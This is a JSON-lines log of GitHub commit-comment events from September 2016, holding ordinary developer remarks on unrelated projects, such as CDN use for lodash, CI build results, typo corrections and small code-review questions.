{"id":"4528447816","type":"CommitCommentEvent","actor":{"login":"chrisknoll"},"repo":{"name":"OHDSI/Atlas"},"payload":{"comment":{"id":18930376,"position":null,"line":null,"path":null,"commit_id":"de2e3978e0d8abdb5b3b140edefe5deadcaa78b2","created_at":"2016-09-07T15:36:05Z","updated_at":"2016-09-07T15:36:05Z","body":"Is there any reason to not use a CDN for this library:\r\n\r\nhttps://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.15.0/lodash.js\r\n\r\nor\r\n\r\nhttps://cdnjs.cloudflare.com/ajax/libs/lodash.js/4.15.0/lodash.min.js\r\n\r\n-Chris\r\n"}},"created_at":"2016-09-07T15:36:05Z"}
{"id":"4528448869","type":"CommitCommentEvent","actor":{"login":"photomedia"},"repo":{"name":"eprints/irstats2"},"payload":{"comment":{"id":18930381,"position":null,"line":null,"path":null,"commit_id":"d14a4be355c73a38cbfea35e25fa68e9530d2c02","created_at":"2016-09-07T15:36:14Z","updated_at":"2016-09-07T15:36:14Z","body":"These files live in two folders: \r\n1)  /lib/epm/irstats2/cgi/stats/\r\n2)  /archives/repoid/cgi/stats/\r\nWhat would be the best practice when updating for this fix: should we update the files in both locations?\r\nThanks!"}},"created_at":"2016-09-07T15:36:14Z"}
{"id":"4528449899","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18930387,"position":null,"line":null,"path":null,"commit_id":"3f6261efcd4bb89c8717d573b61507419b102ea4","created_at":"2016-09-07T15:36:23Z","updated_at":"2016-09-07T15:36:23Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.759.3f6261efcd4bb89c8717d573b61507419b102ea4](http://build.palaso.org/viewLog.html?buildId=76510&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:05:42"}},"created_at":"2016-09-07T15:36:23Z"}
{"id":"4528462349","type":"CommitCommentEvent","actor":{"login":"JingkaiTang"},"repo":{"name":"JingkaiTang/github-play"},"payload":{"comment":{"id":18930418,"position":null,"line":null,"path":null,"commit_id":"51b550425a91a97480714fe9bc63cb5112f6f729","created_at":"2016-09-07T15:38:09Z","updated_at":"2016-09-07T15:38:09Z","body":"假装自己在提交～"}},"created_at":"2016-09-07T15:38:09Z"}
{"id":"4528462461","type":"CommitCommentEvent","actor":{"login":"Memphiz"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18930419,"position":482,"line":665,"path":"xbmc/addons/AddonDatabase.cpp","commit_id":"8f7b6a25d42f719b959e94a25eb02aa600f3386c","created_at":"2016-09-07T15:38:10Z","updated_at":"2016-09-07T15:38:10Z","body":"Well i got an adodn db - this one here:\r\n\r\nhttp://forum.kodi.tv/showthread.php?tid=285493&pid=2408437#pid2408437\r\n\r\nWhile it has a different stacktrace - it indeed crashes on my osx system. But its unrelated to this. But maybe you have an idea if this is expected with circular dependencies:\r\n\r\nhttp://pastebin.com/1EJnAyXG\r\n\r\n@phil65 as far as i can see it is an circular dependency between script.module.t9.search and script.module.kodi65 which have both eachother in the required section. Not sure if we support this or not?"}},"created_at":"2016-09-07T15:38:10Z"}
{"id":"4528466729","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18930432,"position":null,"line":null,"path":null,"commit_id":"56ca553f92dbbb5b508dc1665003d6b751c68fc1","created_at":"2016-09-07T15:38:46Z","updated_at":"2016-09-07T15:38:46Z","body":"fast-forwarding develop-2.2 to borshop-integration-674-fd-tls-tag = c22d33e8"}},"created_at":"2016-09-07T15:38:46Z"}
{"id":"4528471300","type":"CommitCommentEvent","actor":{"login":"chrisknoll"},"repo":{"name":"OHDSI/Atlas"},"payload":{"comment":{"id":18930439,"position":null,"line":null,"path":null,"commit_id":"de2e3978e0d8abdb5b3b140edefe5deadcaa78b2","created_at":"2016-09-07T15:39:27Z","updated_at":"2016-09-07T15:39:27Z","body":"Additionally: this libary I don't think is in amd form (can't tell from the github ui), but if it is not, there is a amd version of this library:\r\nhttps://www.npmjs.com/package/lodash-amd\r\n\r\nIt would be best to get this as a CDN, however.\r\n\r\n-Chris\r\n"}},"created_at":"2016-09-07T15:39:27Z"}
{"id":"4528472573","type":"CommitCommentEvent","actor":{"login":"swaschkut"},"repo":{"name":"cpainchaud/pan-configurator"},"payload":{"comment":{"id":18930443,"position":null,"line":null,"path":null,"commit_id":"af7543e489cf039a7c9820ad7a77bf4603ffa78a","created_at":"2016-09-07T15:39:38Z","updated_at":"2016-09-07T15:39:38Z","body":"Yes,\nBecause I got errors in Tag which including #\n\nVon meinem iPhone mithilfe von TouchDown (www.symantec.com) gesendet\n\n\n-----Original Message-----\nFrom: Christophe [notifications@github.com]\nReceived: 7. Sep., 15:51\nTo: cpainchaud/pan-configurator [pan-configurator@noreply.github.com]\nCC: Sven Waschkut [swaschkut@paloaltonetworks.com]; Mention [mention@noreply.github.com]\nSubject: Re: [cpainchaud/pan-configurator] improve url encoding for TAGs with # (af7543e)\n\n\n\nHi @swaschkut<https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_swaschkut&d=DQMCaQ&c=V9IgWpI5PvzTw83UyHGVSoW3Uc1MFWe5J8PTfkrzVSo&r=Jb4dHoFDiFQrZ-z3V4d67X3hMAoYOJl734q7LTcgj6k&m=NcEtGSFGaYFtW4RTUIOvRmblAeYiUeK9WBBI1YSCxog&s=-m9tILsIH-S7GBM_P9wZzj1wK4_tUrQXvny2zLyahrc&e=> ,\n\nCan you tell if you added this line because # was creating errors ?\n\n-\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_cpainchaud_pan-2Dconfigurator_commit_af7543e489cf039a7c9820ad7a77bf4603ffa78a-23commitcomment-2D18928621&d=DQMCaQ&c=V9IgWpI5PvzTw83UyHGVSoW3Uc1MFWe5J8PTfkrzVSo&r=Jb4dHoFDiFQrZ-z3V4d67X3hMAoYOJl734q7LTcgj6k&m=NcEtGSFGaYFtW4RTUIOvRmblAeYiUeK9WBBI1YSCxog&s=IMr33Q3P_0o86waz4vUvtXgC5y8OyZqGSqiOl6DZhv8&e=>, or mute the thread<https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_notifications_unsubscribe-2Dauth_AP5Fvcqw4mPlI3cYTszjh9nio92xu6-5FHks5qnsFhgaJpZM4J28Qm&d=DQMCaQ&c=V9IgWpI5PvzTw83UyHGVSoW3Uc1MFWe5J8PTfkrzVSo&r=Jb4dHoFDiFQrZ-z3V4d67X3hMAoYOJl734q7LTcgj6k&m=NcEtGSFGaYFtW4RTUIOvRmblAeYiUeK9WBBI1YSCxog&s=Nkdz-y6f-1h9ggdy3-eM86do6X-1y_-Bl-PE-_amYzQ&e=>.\n"}},"created_at":"2016-09-07T15:39:38Z"}
{"id":"4528472777","type":"CommitCommentEvent","actor":{"login":"glyg"},"repo":{"name":"DamCB/tyssue"},"payload":{"comment":{"id":18930444,"position":9,"line":220,"path":"tyssue/core/objects.py","commit_id":"c02c21139100d67832fb4396f2372d30316ee330","created_at":"2016-09-07T15:39:40Z","updated_at":"2016-09-07T15:39:40Z","body":"ok! that's a funny one! You can remove the code, then ;p"}},"created_at":"2016-09-07T15:39:40Z"}
{"id":"4528473242","type":"CommitCommentEvent","actor":{"login":"sanser"},"repo":{"name":"Dolibarr/dolibarr"},"payload":{"comment":{"id":18930445,"position":null,"line":null,"path":null,"commit_id":"31811d314c9c729d5f5466d0e505906e282ab0c7","created_at":"2016-09-07T15:39:44Z","updated_at":"2016-09-07T15:39:44Z","body":"Is the code redundant, or it is ok?"}},"created_at":"2016-09-07T15:39:44Z"}
{"id":"4528475272","type":"CommitCommentEvent","actor":{"login":"AlexTes"},"repo":{"name":"edorivai/randomize-location"},"payload":{"comment":{"id":18930450,"position":19,"line":17,"path":"src/index.js","commit_id":"818309132b69961958f909dcb67816001f4e1aa1","created_at":"2016-09-07T15:40:00Z","updated_at":"2016-09-07T15:40:00Z","body":"Avoiding param property re-assign. This has been solved!"}},"created_at":"2016-09-07T15:40:00Z"}
{"id":"4528481714","type":"CommitCommentEvent","actor":{"login":"anonrig"},"repo":{"name":"sourcebot/sourcebot"},"payload":{"comment":{"id":18930467,"position":10,"line":61,"path":"src/slack/ws.js","commit_id":"61d23733e9bd979b586412d8901d728a1d0e90a8","created_at":"2016-09-07T15:40:57Z","updated_at":"2016-09-07T15:40:57Z","body":"Please, add a new line after this line. @HKK13 "}},"created_at":"2016-09-07T15:40:57Z"}
{"id":"4528482814","type":"CommitCommentEvent","actor":{"login":"cspann"},"repo":{"name":"vs-uulm/bft-smart"},"payload":{"comment":{"id":18930473,"position":null,"line":null,"path":null,"commit_id":"74b20d3c0e9eba5ca83c69a5087606ff501ba2c8","created_at":"2016-09-07T15:41:07Z","updated_at":"2016-09-07T15:41:07Z","body":"@fjhauck Es ist vollbracht! ;)"}},"created_at":"2016-09-07T15:41:07Z"}
{"id":"4528490153","type":"CommitCommentEvent","actor":{"login":"fpagnoux"},"repo":{"name":"openfisca/openfisca-france"},"payload":{"comment":{"id":18930488,"position":null,"line":null,"path":null,"commit_id":"7b957f004226d18a9fc31e3ee5f8f15806876786","created_at":"2016-09-07T15:42:14Z","updated_at":"2016-09-07T15:42:14Z","body":"I merged this PR into `baremes-ipp` with PR https://github.com/openfisca/openfisca-france/pull/559. Are you sure this one is the problem ?"}},"created_at":"2016-09-07T15:42:14Z"}
{"id":"4528490821","type":"CommitCommentEvent","actor":{"login":"tophensen"},"repo":{"name":"gdikov/StereoVision_HBPPlatform"},"payload":{"comment":{"id":18930491,"position":null,"line":null,"path":null,"commit_id":"d2516b0ae8d2a826310a602463a597b4e1e90bf3","created_at":"2016-09-07T15:42:19Z","updated_at":"2016-09-07T15:42:19Z","body":"Not your fault, Georgi. That was me :-)\n\nInterestingly, save_file=False let's the sim complete without errors. But\nif I only upload a minimal script with just the part below \"if save_file\"\nin Coop*.py that finishes without errors as well. Andrew thinks it is not\nour fault:\nhttps://groups.google.com/d/msg/spinnakerusers/8p46wxGeCv8/T28sGL4VAQAJ\n\n\nOn Wed, Sep 7, 2016 at 4:00 PM, Georgi Dikov <notifications@github.com>\nwrote:\n\n> Oh, I think I found it. Very embarrassing mistake to comment the\n> Simulation.end() line in the Main...\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gdikov/StereoVision_HBPPlatform/commit/d2516b0ae8d2a826310a602463a597b4e1e90bf3#commitcomment-18928784>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFdlXJI7xfBhZ1TsnxpaVUBM8RDoVxh-ks5qnsObgaJpZM4J28wd>\n> .\n>\n"}},"created_at":"2016-09-07T15:42:19Z"}
{"id":"4528491904","type":"CommitCommentEvent","actor":{"login":"CheYulin"},"repo":{"name":"JingkaiTang/github-play"},"payload":{"comment":{"id":18930494,"position":null,"line":null,"path":null,"commit_id":"51b550425a91a97480714fe9bc63cb5112f6f729","created_at":"2016-09-07T15:42:28Z","updated_at":"2016-09-07T15:42:28Z","body":"犀利。。。"}},"created_at":"2016-09-07T15:42:28Z"}
{"id":"4528492173","type":"CommitCommentEvent","actor":{"login":"glyg"},"repo":{"name":"DamCB/tyssue"},"payload":{"comment":{"id":18930495,"position":18,"line":301,"path":"tyssue/core/objects.py","commit_id":"c02c21139100d67832fb4396f2372d30316ee330","created_at":"2016-09-07T15:42:30Z","updated_at":"2016-09-07T15:42:30Z","body":"yeah... that's a bit embarrassing. It's use bellow in the code with the expectation that it does what's coded there, but it's not very clear. I'll look to fix this"}},"created_at":"2016-09-07T15:42:30Z"}
{"id":"4528495175","type":"CommitCommentEvent","actor":{"login":"cmutel"},"repo":{"name":"OcelotProject/Ocelot"},"payload":{"comment":{"id":18930502,"position":null,"line":null,"path":null,"commit_id":"6360d337932ffb3e7cc5de1e28f78ff2919a6515","created_at":"2016-09-07T15:42:57Z","updated_at":"2016-09-07T15:42:57Z","body":"This occurs when users create transformation functions without docstrings"}},"created_at":"2016-09-07T15:42:57Z"}
{"id":"4528501194","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18930513,"position":null,"line":null,"path":null,"commit_id":"d119b408ff2c41f305b7bf8bcfd80cd59cade017","created_at":"2016-09-07T15:43:51Z","updated_at":"2016-09-07T15:43:51Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/31b2d2154d95e55a9ec3fdf1052de671ceb49593/source/_views/default.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/_views/terminuspage.html)\n- [source/docs/_terminuspages/03-examples.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.html)\n- [source/docs/_terminuspages/03-examples.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.md)\n- [source/docs/_terminuspages/04-extend.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.html)\n- [source/docs/_terminuspages/04-extend.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.md)\n- [source/docs/_terminuspages/05-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-commands.md)\n- [source/docs/_terminuspages/05-plugins.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-plugins.md)\n- [source/docs/_terminuspages/06-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-commands.md)\n- [source/docs/_terminuspages/06-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-versions.md)\n- [source/docs/_terminuspages/07-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/07-versions.md)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/assets/css/main.css)\n- [app/config/sculpin_site.yml](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/app/config/sculpin_site.yml)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/_partials/terminus_navbar.html)\n- [source/docs/_terminuspages/01-getting-started.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/01-getting-started.md)\n- [source/docs/_terminuspages/02-install.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/02-install.md)\n- [source/docs/_terminuspages/commands.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/commands.md)\n- [source/docs/_terminuspages/contribute.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/contribute.md)\n- [source/docs/_terminuspages/contribute/style-guide.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/contribute/style-guide.md)\n- [source/docs/_terminuspages/examples.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/examples.md)\n- [source/docs/_terminuspages/extend.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend.md)\n- [source/docs/_terminuspages/extend/create-plugins.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend/create-plugins.md)\n- [source/docs/_terminuspages/extend/plugins.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend/plugins.md)\n- [source/docs/_terminuspages/getting-started.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/getting-started.md)\n- [source/docs/_terminuspages/install.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/install.md)\n- [source/docs/_terminuspages/versions.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/versions.md)\n"}},"created_at":"2016-09-07T15:43:51Z"}
{"id":"4528501309","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/bookdown-demo"},"payload":{"comment":{"id":18930515,"position":null,"line":null,"path":null,"commit_id":"23ba576aa59b84b0e2b3b07be7fcf60e655985b8","created_at":"2016-09-07T15:43:52Z","updated_at":"2016-09-07T15:43:52Z","body":"This is supposed to work with `bookdown::pdf_book`, or the `Build Book` button. I'm not really sure if `rmarkdown::render_site` or `pdf_document` works. "}},"created_at":"2016-09-07T15:43:52Z"}
{"id":"4528502168","type":"CommitCommentEvent","actor":{"login":"glyg"},"repo":{"name":"DamCB/tyssue"},"payload":{"comment":{"id":18930517,"position":53,"line":197,"path":"tyssue/core/tests/test_objects.py","commit_id":"c02c21139100d67832fb4396f2372d30316ee330","created_at":"2016-09-07T15:44:00Z","updated_at":"2016-09-07T15:44:00Z","body":"logging is an external lib, I don't think it is useful to test it"}},"created_at":"2016-09-07T15:44:00Z"}
{"id":"4528507309","type":"CommitCommentEvent","actor":{"login":"kundel"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":18930524,"position":5,"line":379,"path":"artemis-rest/src/main/java/org/apache/activemq/artemis/rest/topic/SubscriptionsResource.java","commit_id":"5792fca9c7877430d27b1636ab60fa76099aab19","created_at":"2016-09-07T15:44:45Z","updated_at":"2016-09-07T15:44:45Z","body":"I think that you meant 1000L. \"L\"\r\nThe compiler doesn't like this :("}},"created_at":"2016-09-07T15:44:45Z"}
{"id":"4528509988","type":"CommitCommentEvent","actor":{"login":"chrisknoll"},"repo":{"name":"OHDSI/Atlas"},"payload":{"comment":{"id":18930530,"position":null,"line":null,"path":null,"commit_id":"de2e3978e0d8abdb5b3b140edefe5deadcaa78b2","created_at":"2016-09-07T15:45:09Z","updated_at":"2016-09-07T15:45:09Z","body":"Hi, last update, I did some digging and it loos like as of 4.15.0 they do use a UMD export on their builds, so this SHOULD be exported as a AMD module.  I checked this link:\r\nhttps://cdn.jsdelivr.net/lodash/4.15.0/lodash.min.js\r\n\r\nTo use this in ATLAS, we'd add this to the main.js require config in the paths section:\r\n`\"lodash\": \"https://cdn.jsdelivr.net/lodash/4.15.0/lodash.min\"`\r\n\r\nAnd then to use it in another module:\r\n\r\n`define(['lodash'], function(_) { \r\n  // use lodash as _ here.\r\n} );`\r\n"}},"created_at":"2016-09-07T15:45:09Z"}
{"id":"4528510811","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18930532,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T15:45:17Z","updated_at":"2016-09-07T15:45:17Z","body":"Try to fix as many bugs as you can."}},"created_at":"2016-09-07T15:45:17Z"}
{"id":"4528516398","type":"CommitCommentEvent","actor":{"login":"benrudolph"},"repo":{"name":"dimagi/commcare-core"},"payload":{"comment":{"id":18930544,"position":null,"line":null,"path":null,"commit_id":"ae6de0880978edb11d2df763ecfb656f5507e33c","created_at":"2016-09-07T15:46:04Z","updated_at":"2016-09-07T15:46:04Z","body":"one thing that could be an issue at some point and i'm not exactly sure how to resolve is if someone's username was\r\n\r\nwill+@dimagi.com\r\n\r\nand someone else's was:\r\n\r\nwillplus@dimagi.com\r\n\r\nthink we could make it a little harder for that to happen? `will+` -> `will#plus#` and `will-` -> `will#dash#`"}},"created_at":"2016-09-07T15:46:04Z"}
{"id":"4528520151","type":"CommitCommentEvent","actor":{"login":"dlech"},"repo":{"name":"ev3dev/ev3dev.github.io"},"payload":{"comment":{"id":18930551,"position":13,"line":36,"path":"_includes/motor.md","commit_id":"92a17b471f017675b48f767dd05ea6406e86752c","created_at":"2016-09-07T15:46:37Z","updated_at":"2016-09-07T15:46:37Z","body":"Yes, not used."}},"created_at":"2016-09-07T15:46:37Z"}
{"id":"4528521489","type":"CommitCommentEvent","actor":{"login":"flar2"},"repo":{"name":"flar2/kenzo"},"payload":{"comment":{"id":18930554,"position":16,"line":332,"path":"arch/arm/boot/dts/qcom/msm8956.dtsi","commit_id":"6a85d83174b24f57b022d0c7c674cfc0367ab76d","created_at":"2016-09-07T15:46:49Z","updated_at":"2016-09-07T15:46:49Z","body":"I think you would need to add another voltage step"}},"created_at":"2016-09-07T15:46:49Z"}
{"id":"4528522828","type":"CommitCommentEvent","actor":{"login":"dret"},"repo":{"name":"dret/webconcepts"},"payload":{"comment":{"id":18930560,"position":null,"line":null,"path":null,"commit_id":"b641b263de7e7c596a941415ca398379d987f736","created_at":"2016-09-07T15:47:02Z","updated_at":"2016-09-07T15:47:02Z","body":"On 2016-09-06 23:19, Kin Lane wrote:\n> I finally got time to import....it works for me....no problems with it.\n> Still working through content and organizing in my scheduling system...I\n> will submit PR if I find anything.\n\nthanks. please be aware that i might change the structure a little. i \nplan to present and talk about this next week at RESTfest, and maybe i \nwill get some feedback before the whole thing gets out more widely. so \ndon't spend a lot of time on the structure as it is now. it should \nstabilize pretty soon, though.\n"}},"created_at":"2016-09-07T15:47:02Z"}
{"id":"4528524156","type":"CommitCommentEvent","actor":{"login":"cpainchaud"},"repo":{"name":"cpainchaud/pan-configurator"},"payload":{"comment":{"id":18930563,"position":null,"line":null,"path":null,"commit_id":"af7543e489cf039a7c9820ad7a77bf4603ffa78a","created_at":"2016-09-07T15:47:16Z","updated_at":"2016-09-07T15:47:16Z","body":"ok.  can you please test your utility with all my changes  included ? your fix was actually breaking something else :)"}},"created_at":"2016-09-07T15:47:16Z"}
{"id":"4528525736","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18930566,"position":115,"line":126,"path":"README.adoc","commit_id":"91fab1147224a4c6050f807e1aec50f2ed940f99","created_at":"2016-09-07T15:47:29Z","updated_at":"2016-09-07T15:47:29Z","body":"Double 'as'"}},"created_at":"2016-09-07T15:47:29Z"}
{"id":"4528530036","type":"CommitCommentEvent","actor":{"login":"svladykin"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18930573,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-07T15:48:09Z","updated_at":"2016-09-07T15:48:09Z","body":"@royrwood \r\n1. H2 tests are just usual `public static void main` programs, so you can run them from IDE like that. I personally do not use Maven with H2 at all.\r\n\r\n2. Yes, there are some errors, I hope that soon we will have Travis CI set up and then we will fix them.\r\n\r\n3. Yes, H2 supports PgSQL wire protocol in attempt to support all the existing PgSQL drivers.\r\n\r\n4. It looks like we had PgSQL Jdbc version in POM (for Java 8), I fixed it."}},"created_at":"2016-09-07T15:48:09Z"}
{"id":"4528531569","type":"CommitCommentEvent","actor":{"login":"jonsherrard"},"repo":{"name":"shortlist-digital/agreable-product-plugin"},"payload":{"comment":{"id":18930579,"position":24,"line":46,"path":"app/Controllers/CategoryController.php","commit_id":"e3d2a467a561eea52cded876cd1ec6e5d4391bef","created_at":"2016-09-07T15:48:21Z","updated_at":"2016-09-07T15:48:21Z","body":"Since we're chatting ternaries... 🙈\r\n```\r\n($index > 0) ?: $context['product_collection_category_prev'] = $categories[$index - 1];\r\n($index < sizeof($categories) - 1) ?: $context['product_collection_category_next'] = $categories[$index + 1];\r\n```\r\nJust a thought really..."}},"created_at":"2016-09-07T15:48:21Z"}
{"id":"4528532492","type":"CommitCommentEvent","actor":{"login":"tmathews"},"repo":{"name":"DerrickGold/Remote-Music-Player"},"payload":{"comment":{"id":18930581,"position":null,"line":null,"path":null,"commit_id":"89d7f6ae8baad1ef137bfe14c3c1983aa919e560","created_at":"2016-09-07T15:48:30Z","updated_at":"2016-09-07T15:48:30Z","body":"The formatting committed here is broken."}},"created_at":"2016-09-07T15:48:30Z"}
{"id":"4528535140","type":"CommitCommentEvent","actor":{"login":"nixpanic"},"repo":{"name":"gluster/glusterfs"},"payload":{"comment":{"id":18930588,"position":11,"line":7,"path":"README.md","commit_id":"dbc8dac5c357a28aeba17894f8b02faa2af2a792","created_at":"2016-09-07T15:48:53Z","updated_at":"2016-09-07T15:48:53Z","body":"I think this has been fixed with commit dd4fae6c78dc70cd31fe82ecd8aa85ade93cf17f through http://review.gluster.org/15412 ?\n"}},"created_at":"2016-09-07T15:48:53Z"}
{"id":"4528535899","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"FrogCraft-Rebirth/OmniOcular"},"payload":{"comment":{"id":18930594,"position":null,"line":null,"path":null,"commit_id":"7623a1e3a44a1a8f5fb8de7bc832cf95574bd083","created_at":"2016-09-07T15:49:00Z","updated_at":"2016-09-07T15:49:00Z","body":"Or just breaking ahead: add kotlin runtime and compiler in `classpath` when launching Minecraft."}},"created_at":"2016-09-07T15:49:00Z"}
{"id":"4528538185","type":"CommitCommentEvent","actor":{"login":"nouiz"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":18930601,"position":5,"line":40,"path":"theano/gpuarray/tests/tstgpueye.c","commit_id":"5c9ad24e319831432bea2ee798b70a10011f7b0e","created_at":"2016-09-07T15:49:20Z","updated_at":"2016-09-07T15:49:20Z","body":"ok.\n\nOn Tue, Sep 6, 2016 at 4:11 PM, abergeron <notifications@github.com> wrote:\n\n> It's not impossible, but it would be much less safer since a varargs\n> function does not convert its arguments to known types and thus would\n> require that the user match the types exactly.\n>\n> This is why I did not go that route.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Theano/Theano/commit/5c9ad24e319831432bea2ee798b70a10011f7b0e#commitcomment-18917768>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AALC-yhKv-a0m3mwm-6xISU3GAiuJ3pjks5qnckNgaJpZM4JzAmi>\n> .\n>\n"}},"created_at":"2016-09-07T15:49:20Z"}
{"id":"4528538807","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18930609,"position":126,"line":133,"path":"README.adoc","commit_id":"91fab1147224a4c6050f807e1aec50f2ed940f99","created_at":"2016-09-07T15:49:26Z","updated_at":"2016-09-07T15:49:26Z","body":"Don't need 'contents' twice. Also, I prefer 'content' for a file as it's like a mass noun (vis-a-vis 'the jar contains sugar'), but that may be personal preference. I wouldn't even mention it if it wasn't for the duplication :smile:"}},"created_at":"2016-09-07T15:49:26Z"}
{"id":"4528540800","type":"CommitCommentEvent","actor":{"login":"yanns"},"repo":{"name":"commercetools/commercetools-jvm-sdk"},"payload":{"comment":{"id":18930616,"position":null,"line":null,"path":null,"commit_id":"5f384375d0d2dd3c8ab57fa73b98cebf4fe5103d","created_at":"2016-09-07T15:49:43Z","updated_at":"2016-09-07T15:49:43Z","body":"yes for some tests at least"}},"created_at":"2016-09-07T15:49:43Z"}
{"id":"4528546046","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18930624,"position":103,"line":111,"path":"README.adoc","commit_id":"91fab1147224a4c6050f807e1aec50f2ed940f99","created_at":"2016-09-07T15:50:30Z","updated_at":"2016-09-07T15:50:30Z","body":"'and notice that _the_ resulting...'. Also, to be more precise this should say that the file _name_ contains the version."}},"created_at":"2016-09-07T15:50:30Z"}
{"id":"4528546074","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18930625,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T15:50:30Z","updated_at":"2016-09-07T15:50:30Z","body":"Wow!  GL @ LTC."}},"created_at":"2016-09-07T15:50:30Z"}
{"id":"4528546377","type":"CommitCommentEvent","actor":{"login":"crcrewso"},"repo":{"name":"nrc-cnrc/EGSnrc"},"payload":{"comment":{"id":18930626,"position":null,"line":null,"path":null,"commit_id":"1cdd182923f7dbaa78397aee3717154f69d2e450","created_at":"2016-09-07T15:50:32Z","updated_at":"2016-09-07T15:50:32Z","body":"I'm reading this over. One question, and this might just be me. What happens if the user inputs a stop particle index less than the start particle index???"}},"created_at":"2016-09-07T15:50:32Z"}
